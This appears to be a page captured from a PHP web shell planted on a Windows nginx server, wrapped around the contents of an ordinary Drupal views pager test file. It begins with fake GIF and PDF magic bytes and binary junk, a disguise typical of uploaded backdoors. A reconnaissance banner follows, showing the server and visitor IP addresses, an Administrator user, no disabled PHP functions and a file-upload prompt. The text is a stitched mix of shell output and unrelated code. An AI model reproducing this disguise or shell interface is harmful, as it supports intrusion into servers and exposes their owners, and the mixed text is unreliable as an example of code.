GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/views/src/Tests/Wizard/ |
Upload File : |
<?php namespace Drupal\views\Tests\Wizard; /** * Tests the ability of the views wizard to create views without a pager. * * @group views */ class PagerTest extends WizardTestBase { /** * Tests the pager option. */ public function testPager() { // Create nodes, each with a different creation time so that we have // conditions that are meaningful for the use of a pager. $this->drupalCreateContentType(['type' => 'page']); for ($i = 0; $i < 12; $i++) { $this->drupalCreateNode(['created' => REQUEST_TIME - $i]); } // Make a View that uses a pager. $path_with_pager = 'test-view-with-pager'; $this->createViewAtPath($path_with_pager, TRUE); $this->drupalGet($path_with_pager); // This technique for finding the existence of a pager // matches that used in Drupal\views_ui\Tests\PreviewTest.php. $elements = $this->xpath('//ul[contains(@class, :class)]/li', [':class' => 'pager__items']); $this->assertTrue(!empty($elements), 'Full pager found.'); // Make a View that does not have a pager. $path_with_no_pager = 'test-view-without-pager'; $this->createViewAtPath($path_with_no_pager, FALSE); $this->drupalGet($path_with_no_pager); $elements = $this->xpath('//ul[contains(@class, :class)]/li', [':class' => 'pager__items']); $this->assertTrue(empty($elements), 'Full pager not found.'); } /** * Create a simple View of nodes at a given path. * * @param string $path * The path at which the View should be created. * @param bool $pager * A boolean for whether the View created should use a pager. */ protected function createViewAtPath($path, $pager = TRUE) { $view = []; $view['label'] = $this->randomMachineName(16); $view['id'] = strtolower($this->randomMachineName(16)); $view['show[sort]'] = 'node_field_data-created:ASC'; $view['page[create]'] = 1; $view['page[title]'] = $this->randomMachineName(16); $view['page[path]'] = $path; $view['page[pager]'] = $pager; $this->drupalPostForm('admin/structure/views/add', $view, t('Save and edit')); } }